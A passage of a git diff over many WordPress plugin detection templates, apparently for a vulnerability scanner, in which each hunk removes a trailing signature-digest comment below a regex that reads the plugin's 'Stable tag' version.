b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207aab14790e4f66c7b2bfa9980f316354bdf5ec81549741b15698c4ace937f190022072c9060cc4acb75cbffc8d9ac31990343f61f718cf2d900145cc77957f751cee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 08e75c64fb..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf092b9205b8d9541e6ae14d99d6365708308871c3fb1caf2679abd590d81c4a022023de00cceb053601c9a9c721ae505f157adcfde7b655e96df92a44a1b501ff85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 4ae1eb5193..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031cb29c2367d75a6e2f0ec8593a6153fd06659178df82cbd076ed747da46ccaa0221008ba7ab569858e57694985eb55609ad60901c83c6dfb2d04278fb89afcea73fa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index e6858f26ce..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a69b3474655a566636757b569dc9c87cd8d71e4b41f3546dd707728026d0bb10220704d1472c8d4d32042642382bd1c0bfffef1cb319ab1468c1cd2206b2e2689bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index b7678c04bc..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220503330511cba927f339a2cc529aa6a47f7ff8ac5af6a368ca688e798509ff62302200707065d70186c1da325377c1533debab7fdab0fa6f36a9f87863aa56c957b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 558897e867..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1dff588ce9184e77f359e828ee8839d1030fdeb4ceb3fcfff87cd2be584638f02207ed55f392fdd351e5fb31c495ff38eaec7ba6d3b8cf804a95e032b23d03071a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 801d439a1c..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a399a389d356d9ec8cc864d7f8333d263d02e2d713fcfb712c12eae402a0c6a022100da402e1ce5b4443b4f2faa76abfd6eeadd549861b925f9c7776ef6549b46fcd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index bbf2320e2d..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff89da35c11650dbda7a76fd3d9bc28a8b1b65a05ff8bef2a8534765cbad5bdc022100df44496df86d8ece6eb3696bd11983d90f0a84de70b9e01b1e9aa4458ab245c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 0f457740ee..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220624c4bd6450e2504dc2ab85bd73d3f6cf5e96591fea6e60adcd94c5dd3562cd10220615b5677ba732df6b192b55f703fd16c8cca6e2f15df8f9d6375b9d73ef6d4ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index c8167b6783..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100865b486097acea255d08a77f0c6e2164d94a70c896b42c239be07662b95beee60221009fae18af3020f242cf914cae75c4e7f52a7451075ed0db79484ad7289b79d686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6b4d172e13..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200254fc537503193fdd304ae1dc8ae6810e1261c511b28bbf2bb7a2da9824357602210097d2c41afbcb5edb86bad7de3d2d6ea9b2249bc38d288e9a12b58811387c33e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 04b344f249..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220411bee7cb8e483ddb01e190cdfd9ecf9c55c69d1f8dca53b862fc090fc413ddf02207ddcb8590399ece6b73771472821d4b360521f306395a5a0c042e3755b0ad96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index bc79cfec06..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025624c7fad1aa2cc61182345fe3bb00956b7130427c00ef9f64040212a749574022100bec83eba339fe2834911d4780efc6205073ef5aeea7fdbfd20c8903cb9de084e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 26f6988a54..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cdd40e615ae58b0bb7ebe450c21f9ac1a745f3a1cc0c394d7f65aee021d71bfc0220744ca93c81ffa8ec72601ade1227a2aab417a21078f032a1e5b96c7028486d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 66cdc6861d..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201342fee7d49db8742ed3f66291388318ce79f40a7905d3a4e9df0b2e7ebb8274022100809e1d71d7d46457ee92e854f7c1e10bcce560ea5b3dc50468d8004c95a8e350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index bc59a0e040..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d7fec04dcddda2a11d6529e5cf22e419ddb4f90f2501ad4657a2e4310924461022036d5b78463ba4649e6d209bd872df678ca4968a1b8372ceb5b88b14bc3a9a07a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 275ecfc796..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068f93f33abaa07592a6f0bbb09c34b328f26adb9c27a564c8f50768930bff681022100ffcf700555a3261639c4e6356be603fa788f883371c912af93b074b4930dd8da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 406f356578..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a421d25a3e5777f659f5d9dd9858edef0aee7bdf5ef0dc96e28fa9fe78d76cb02200dcb39119c9ce365734dbb85a316be2b24e79a44aaf37b25ffb92f41fb7af04d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 9d2c2a246f..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045e7849e540774aa643af16d73d456bd7cbdff2a179d61c57750024b3bd0706b0221009f70b649f45e3001b60b0a567d8a4539da0dc7f4d1673d53c50fef34bce4154d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index d2703434c8..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5be11360f0e3cb59da6b84933d94c1f5b33595b6cebf3f3e6e48080d65cdacb022100fcf4ea61374db0fdbfbf71ad19e9009c37417a2a3d1dd5d2f4ea7f1c99ad2dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 242144209c..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a53ce8a6640a7200c1fe21a4306b341dabcf4457722ac04c9be07e9d0c153ab022100ea6c29d7ea3a6e642ec8d07830f28ac58b960d76e4efc8d03b0c77381f187410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index e63295d602..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ca383a870af26e8b1580b51dc0d2d3eeee1f5f49583e262a737439ee9c93e0e022054f138b70f165f28b92f6f4d66e0f2c960b82d2e65e7bfa0e07111fea9e92fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 8126c49a3f..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204017b775b5271995c95dc6826da7e39539c137ef05b8cbafb9b17699bd377ee7022100e2111faef0b209432dfb6a3e9d8e291998e34ecc21339324516c0e59463b8c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 6ff19250ec..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052fcb17a6f0f602aeee8449561a16323640ade258c4094e45219902f628eb08202206d7d808926f3c403643cd08148dfce7f06280c15896b41de79b82a8564d74e82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index fb2aade757..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091bb00d92765756e517280fbfe535b0c1191eefdc687b6a2eb05d3b87f0f34a40220705ecc97045bb03425cf5381795e68f0b5072539b5431fe7a35cbeb9c8a25ebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 80539df5b2..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fdff563b6f30c60c2d024c08bb598ad031ad7b45c176e6e015733e5c3859ad810220221f79f9675cfeb52e88d988812dad583c5ec0a9d80d29d113c035a0beef67ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index c0030fd3de..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024ffa2c78393c0e09e7a6efbcb99776756f6d42f747d00233c560bc569c9cf5d022100891983bc3d277dcfe79940ec977ef3c39805744a0708d81c19048ed580c9a6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 9af5c3b1ce..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061360178e7bcdedf298c5c91189842687c91866891dbb445585951c82601a3e302206925d5926683fafbdc70fb8d2439558b286c28664cc5c49456f6fffd94d00db0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index c35ab9623b..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013c85737d802221012862f6e1c095573ab229f036fba9da47f1fecefac5040d1022100a62b130f7563e773e04f8f2f89a96db9c37a85c22d1725051a0c27022a1948ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 0acfb86d47..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220646be73e57deab9711216a617271f9594fbf6c46f0fdc103589a2dfa5a7b09350221009c6c9c700e30bf693d6a36aa66368c3e89ecb080517565f1026ff6185fb2ea0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 6de69f0cb9..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204893e1f4385e141ed856b9694975445db1a73ef6fc3acdf2d7820ec24457271c022100c4a70fefea588de7a6b5ea1af7e5ffd8daccdd48189dca9254cdd3bfb66f18b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index b756c16009..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008178749a1e300440fae9488d54df908cf776530b8e831033b449e05161e4195502201d68273acb37be93c35fe25731377d84f17b583e8ce0af1373347ea2d8932231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index e6e6fe6d35..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5f32177992c63fa490b8e49775c823158c906021bc3f3471eca5afbc0540c4b0220463d8dfab06722677247af97acaee963620853c1d9fcc66dee9ff9c29f2e5162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 27133fd53d..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e63a0cf1d5377087b962173e118dd7a46c8c41e946b0591e5b76c2ef7e60f01b022054e7b4d4c7bd607e7ef979f5997ad41352cbe5deb86985254d909bcf644ecfbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 6d2538857a..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036046b049086918bfeddc97a71a5259f1b0540b08ad5d3f95aa39bfd42ce38920220036f051a90a9938d6a97cc07e51b3343dfc2826e76a569b218e75a31f0710e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index ba9b011d06..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206cd4ae1548ca5aeeacf3e753bbee01a03dcaacda576ed74880b3dafd4edb1476022100842510ab65e025f2c3b44a5e1521fecd1b8e715948366975b6b91ec139c288bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 63251d60ed..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca929d5d8bac9dd261040a4e1f4fbaf734fbd092a31fe23d36f5eacdae135423022016f6094d211dc2a7d4940b84866bb9ed9cdd9c270e555f8b61e5e3b45a7aeeb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index f1b86fc2cd..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097be8004f4d52fc79d9459487cb23d243724964e07fe2a793b64407489c542c5022100917aefdc038a5081b087f86142caf157dcc8c643141e30c30ddd21db88601796:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index b3775fdd13..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aaf42f8c84af132465b691ed4dbd4608723a054a7dde9d328f84ea57ac2db64c02207f97aae6270326e6bd5470c0f7cf6a18c923e20bf85a36a9d18a9ceec3139e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index c74c537b8a..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5bda7b4aad872df7412d999f5932bd830f5f43fd9bc5ef41c56832e9f27fce6022100be838ada6e2d2561f8270adbbc081885c9c79565933473364416680f9f368380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index dfd4e9cc02..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5e6ce410aaf6c4759028351784d457b92b099a0e40a33bdc832b04a6a6d8702022028edd09f612a2b81a67695d5fbd62f2c0508e87fa9382fb64706016d025e485c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 006ca5b80e..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2386b96e76833e789f4022758c81dca47244641542169f78935a71fd9f9eefd0220230a97f0b24d84bdcbacc28a74e739689fc332fb7a1f80b59f4416ac38a0999e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index c676d658be..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1bf64faf3ed6e5c8b5d40949a457c80c1a856d9858dea625dcceb3d9942557802206d1903da36f7fe3f4f9603f0f4fee4b2147b473bef3abffc738188af12f92a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3c710f3b6f..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcfd4433b7760f3f6942d142d0cef1c634343c23ecf483e82ce2efcaecd385a10220009c96e362cae90995742cd9814193e290fe0d09b8641bdd4eb5191cb7d6bb55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index b3a19ca44b..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e80e0d95f79dfbc096796aec32e766bfe563890241364fb210b658901d3d94202204a8359e8f2550798f32bdbe17edc25a3e2a92d0b6b7a5bc2b8169d642379fa61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index b4d3ada11a..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013c6399fecdb4a153eaf9f1255e4025819342bffa296f077ced1e367329ed139022100e6716adfd46e82ab0665d899a9a39f6ac4195cc57eca9eafc2a7b0074c4a8d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 6e12a22ed3..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201dcc2b4f17b64a9ff3caeccc262a096e8bd0936000ec0c86e5e9d2fd59ed998d022100f6a94c6aded17b21d6132db7b1d7243fc367a93ed9c5e0d2fdf3704ff3c7c404:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 1a6d99fc3c..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 